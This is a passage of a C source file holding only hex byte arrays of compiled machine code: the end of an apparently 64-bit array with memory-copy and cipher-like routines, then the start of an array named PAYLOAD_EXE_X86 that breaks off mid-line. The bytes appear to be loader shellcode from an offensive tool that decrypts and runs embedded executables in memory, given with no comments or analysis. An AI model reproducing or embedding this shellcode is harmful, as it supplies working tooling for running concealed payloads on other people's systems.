1232 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8d, 0x50,
1233 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, 0x75, 0xdf, 0x48, 0x8b,
1234 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1235 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1236 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1237 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x17, 0x48, 0x8b,
1238 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48,
1239 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0, 0x01, 0x48, 0x8b, 0x45,
1240 0x20, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0,
1241 0x75, 0xd8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1242 0x55, 0x56, 0x53, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x20, 0x48, 0x89,
1243 0x55, 0x28, 0x4c, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48, 0x8b,
1244 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01, 0x0f,
1245 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00,
1246 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x48,
1247 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff,
1248 0xff, 0xff, 0xff, 0xeb, 0x1d, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x16,
1249 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x30,
1250 0x48, 0x85, 0xc0, 0x75, 0xb7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e,
1251 0x5d, 0xc3, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
1252 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1253 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
1254 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
1255 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc,
1256 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03,
1257 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b,
1258 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xdc, 0x01, 0xc2,
1259 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xdc, 0xc1,
1260 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31, 0xd0, 0x89, 0x45, 0xdc,
1261 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xe4, 0xc1, 0xc8, 0x08,
1262 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45,
1263 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xec,
1264 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xe4, 0x8b,
1265 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
1266 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1267 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1268 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45,
1269 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf0,
1270 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
1271 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0x8b,
1272 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1273 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40, 0x75, 0x73, 0xb8, 0x10,
1274 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc1, 0x48, 0x8d, 0x55, 0xd0,
1275 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00,
1276 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xbe, 0xfd, 0xff, 0xff, 0x8b, 0x45,
1277 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d, 0xf0, 0x0b, 0x76, 0x2b,
1278 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8,
1279 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
1280 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
1281 0x89, 0xc1, 0xe8, 0x85, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0xc1, 0xe0,
1282 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10, 0x00, 0x00, 0x00, 0x83,
1283 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0,
1284 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xf0, 0x88,
1285 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83, 0x45, 0xf4, 0x01, 0x83,
1286 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45,
1287 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45,
1288 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00,
1289 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83,
1290 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
1291 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1292 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1293 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8,
1294 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc,
1295 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
1296 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, 0x95, 0x00, 0x00,
1297 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, 0x8b, 0x0a, 0x8b,
1298 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1299 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, 0x89, 0x10, 0x83,
1300 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, 0xc7, 0x45, 0xfc,
1301 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1302 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b,
1303 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45,
1304 0xf0, 0x48, 0x8d, 0x50, 0x04, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
1305 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
1306 0x8b, 0x00, 0x31, 0xc8, 0x89, 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1307 0xc0, 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a,
1308 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x01, 0xca,
1309 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x48, 0x8b,
1310 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1,
1311 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31,
1312 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48,
1313 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, 0x48, 0x8b, 0x55,
1314 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x01, 0xca, 0x89, 0x10, 0x48,
1315 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2, 0x48, 0x8b,
1316 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b,
1317 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x8d, 0x50, 0x0c,
1318 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0,
1319 0x0d, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x31, 0xc8, 0x89,
1320 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x55,
1321 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, 0x07,
1322 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, 0xca,
1323 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x8b,
1324 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0xc1, 0xc2, 0x10, 0x89,
1325 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x0f, 0x0f, 0x86, 0xda,
1326 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42,
1327 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
1328 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c,
1329 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca,
1330 0x8b, 0x0a, 0x8b, 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00,
1331 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca,
1332 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8,
1333 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1334 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1335 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48,
1336 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xe8, 0xe9,
1337 0xd4, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb,
1338 0x1d, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1339 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x88, 0x54,
1340 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x7e, 0xdd,
1341 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
1342 0x9c, 0xfd, 0xff, 0xff, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x83, 0x7d,
1343 0x28, 0x10, 0x48, 0x0f, 0x46, 0x45, 0x28, 0x89, 0x45, 0xe4, 0xc7, 0x45,
1344 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x45, 0xf4, 0x48, 0x63,
1345 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x48,
1346 0x63, 0xc8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc8, 0x0f, 0xb6, 0x08,
1347 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x0f, 0xb6, 0x44, 0x05, 0xd0, 0x31, 0xc8,
1348 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xe4,
1349 0x7c, 0xc9, 0x8b, 0x45, 0xe4, 0x48, 0x98, 0x48, 0x29, 0x45, 0x28, 0x8b,
1350 0x45, 0xe4, 0x48, 0x98, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10,
1351 0x00, 0x00, 0x00, 0xeb, 0x25, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x8d,
1352 0x50, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1353 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02,
1354 0xeb, 0x0a, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x7f, 0xd5,
1355 0x48, 0x83, 0x7d, 0x28, 0x00, 0x0f, 0x85, 0x21, 0xff, 0xff, 0xff, 0x90,
1356 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
1357 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1358 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1359 0x00, 0x00, 0x00, 0x00};
1360
0
1 unsigned char PAYLOAD_EXE_X86[] = {
2 0x83, 0xec, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x7c, 0x24, 0x34, 0xff,
3 0x77, 0x2c, 0xff, 0x77, 0x28, 0xff, 0x77, 0x4c, 0xff, 0x77, 0x48, 0x57,
4 0xe8, 0xd1, 0x1a, 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8b, 0xf0, 0xff, 0x77,
5 0x28, 0xff, 0x77, 0x54, 0xff, 0x77, 0x50, 0x57, 0xe8, 0xbd, 0x1a, 0x00,
6 0x00, 0x83, 0xc4, 0x28, 0x8b, 0xd8, 0x89, 0x5c, 0x24, 0x34, 0x85, 0xf6,
7 0x0f, 0x84, 0x15, 0x02, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x84, 0x0d, 0x02,
8 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x37, 0x6a,
9 0x00, 0xff, 0xd6, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xf6, 0x01, 0x00,
10 0x00, 0xff, 0x37, 0x57, 0x56, 0xe8, 0x17, 0x1d, 0x00, 0x00, 0x6a, 0x20,
11 0x8d, 0x44, 0x24, 0x20, 0x6a, 0x00, 0x50, 0xe8, 0x2d, 0x1d, 0x00, 0x00,
12 0x8b, 0x06, 0x8d, 0xae, 0x30, 0x02, 0x00, 0x00, 0x2d, 0x30, 0x02, 0x00,
13 0x00, 0x50, 0x55, 0x8d, 0x46, 0x14, 0x50, 0x8d, 0x46, 0x04, 0x50, 0xe8,
14 0xec, 0x1b, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x18, 0x06, 0x00,
15 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb5, 0x1a, 0x00, 0x00, 0x83, 0xc4,
16 0x34, 0x3b, 0x86, 0x18, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x4f, 0x01, 0x00,
17 0x00, 0x3b, 0x96, 0x1c, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x43, 0x01, 0x00,
18 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76, 0x34, 0xff, 0x76,
19 0x30, 0x56, 0xe8, 0x1b, 0x1a, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x46,
20 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x76, 0x01, 0x00, 0x00, 0x33, 0xff, 0x39,
21 0xbe, 0x34, 0x02, 0x00, 0x00, 0x76, 0x16, 0x8d, 0x9e, 0x38, 0x02, 0x00,
22 0x00, 0x53, 0xff, 0x56, 0x30, 0x47, 0x83, 0xc3, 0x20, 0x3b, 0xbe, 0x34,
23 0x02, 0x00, 0x00, 0x72, 0xf0, 0x33, 0xdb, 0x43, 0x39, 0x5d, 0x00, 0x76,
24 0x34, 0x8d, 0x6e, 0x34, 0x8d, 0x7e, 0x38, 0xff, 0x76, 0x2c, 0xff, 0x76,
25 0x28, 0xff, 0x77, 0x04, 0xff, 0x37, 0x56, 0xe8, 0xce, 0x19, 0x00, 0x00,
26 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xd2, 0x00,
27 0x00, 0x00, 0x43, 0x83, 0xc7, 0x08, 0x83, 0xc5, 0x04, 0x3b, 0x9e, 0x30,
28 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x86, 0x0c, 0x05, 0x00, 0x00, 0x6a,
29 0x02, 0x5b, 0x3b, 0xc3, 0x75, 0x15, 0x56, 0xe8, 0x29, 0x05, 0x00, 0x00,
30 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x0c,
31 0x05, 0x00, 0x00, 0x8d, 0xbe, 0x48, 0x07, 0x00, 0x00, 0x83, 0xf8, 0x01,
32 0x74, 0x02, 0x8b, 0x3f, 0x83, 0xbe, 0x40, 0x03, 0x00, 0x00, 0x01, 0x74,
33 0x26, 0x56, 0xe8, 0x32, 0x03, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08,
34 0x39, 0x9e, 0x40, 0x03, 0x00, 0x00, 0x74, 0x78, 0x56, 0xe8, 0x05, 0x04,
35 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, 0x39, 0x9e, 0x40, 0x03, 0x00,
36 0x00, 0x74, 0x65, 0x83, 0x3f, 0x03, 0x74, 0x59, 0x83, 0x3f, 0x04, 0x74,
37 0x54, 0x83, 0x3f, 0x01, 0x74, 0x23, 0x39, 0x1f, 0x74, 0x1f, 0x83, 0x3f,
38 0x05, 0x74, 0x12, 0x83, 0x3f, 0x06, 0x74, 0x0d, 0x83, 0x3f, 0x07, 0x75,
39 0x43, 0x56, 0xe8, 0xe5, 0x17, 0x00, 0x00, 0xeb, 0x3a, 0x56, 0xe8, 0x4c,
40 0x16, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8,
41 0xe7, 0x0c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x44,
42 0x24, 0x10, 0x50, 0x56, 0xe8, 0xe1, 0x0e, 0x00, 0x00, 0x59, 0x59, 0x8d,
43 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, 0x5d, 0x08, 0x00, 0x00, 0x59, 0xeb,
44 0x06, 0x56, 0xe8, 0x91, 0x11, 0x00, 0x00, 0x59, 0x8b, 0x5c, 0x24, 0x34,
45 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x02, 0xbf, 0x00, 0xc0, 0x00, 0x00,
46 0x75, 0x2e, 0x8b, 0x86, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x24,
47 0xff, 0xb6, 0x40, 0x07, 0x00, 0x00, 0x6a, 0x00, 0x50, 0xe8, 0x7b, 0x1b,
48 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x57, 0x6a, 0x00, 0xff, 0xb6, 0x48, 0x07,
49 0x00, 0x00, 0xff, 0x56, 0x40, 0x83, 0xa6, 0x48, 0x07, 0x00, 0x00, 0x00,
50 0xff, 0x36, 0x6a, 0x00, 0x56, 0xe8, 0x5b, 0x1b, 0x00, 0x00, 0x83, 0xc4,
51 0x0c, 0x57, 0x6a, 0x00, 0x56, 0xff, 0xd3, 0x33, 0xc0, 0xeb, 0x03, 0x83,
52 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x20, 0xc3, 0x8b, 0x44,
53 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
54 0x00, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10,
55 0x02, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85,
56 0xff, 0x74, 0x1b, 0x8b, 0x46, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04,
57 0x8b, 0x46, 0x14, 0x89, 0x07, 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b,
58 0x7d, 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
59 0x0d, 0x83, 0xc6, 0x0c, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37,
60 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04,
61 0x8b, 0x40, 0x28, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01,
62 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x08, 0x18, 0x00, 0x00,
63 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x13, 0x14, 0x40, 0x00, 0xbf, 0xe4, 0x2a,
64 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0xed,
65 0x17, 0x00, 0x00, 0xb9, 0x62, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
66 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0xda, 0x17, 0x00, 0x00, 0xb9, 0x72,
67 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08,
68 0xe8, 0xc7, 0x17, 0x00, 0x00, 0xb9, 0xc0, 0x12, 0x40, 0x00, 0x2b, 0xcf,
69 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xb4, 0x17, 0x00, 0x00,
70 0xb9, 0x76, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
71 0x48, 0x10, 0xe8, 0xa1, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, 0x40, 0x00,
72 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, 0x8e, 0x17,
73 0x00, 0x00, 0xb9, 0x0e, 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
74 0x06, 0x89, 0x48, 0x18, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12,
75 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8,
76 0x68, 0x17, 0x00, 0x00, 0xb9, 0xc3, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03,
77 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x55, 0x17, 0x00, 0x00, 0xb9,
78 0xbe, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
79 0x24, 0xe8, 0x42, 0x17, 0x00, 0x00, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0x2b,
80 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24,
81 0x08, 0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x28, 0x5e, 0xc3, 0x33, 0xc0,
82 0xc2, 0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56,
83 0x6a, 0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc,
84 0x8d, 0x45, 0xd4, 0x50, 0xe8, 0xc4, 0x19, 0x00, 0x00, 0x8b, 0x75, 0x0c,
85 0x8d, 0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50,
86 0x0c, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d,
87 0x4d, 0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33,
88 0xc0, 0x5e, 0xc9, 0xc2, 0x08, 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b,
89 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
90 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74,
91 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x28, 0x8b, 0x84, 0x97, 0xfc, 0x03, 0x00,
92 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee,
93 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84, 0x97, 0xac, 0x04, 0x00, 0x00, 0x3b,
94 0x04, 0x93, 0x75, 0x10, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31,
95 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8,
96 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c,
97 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2,
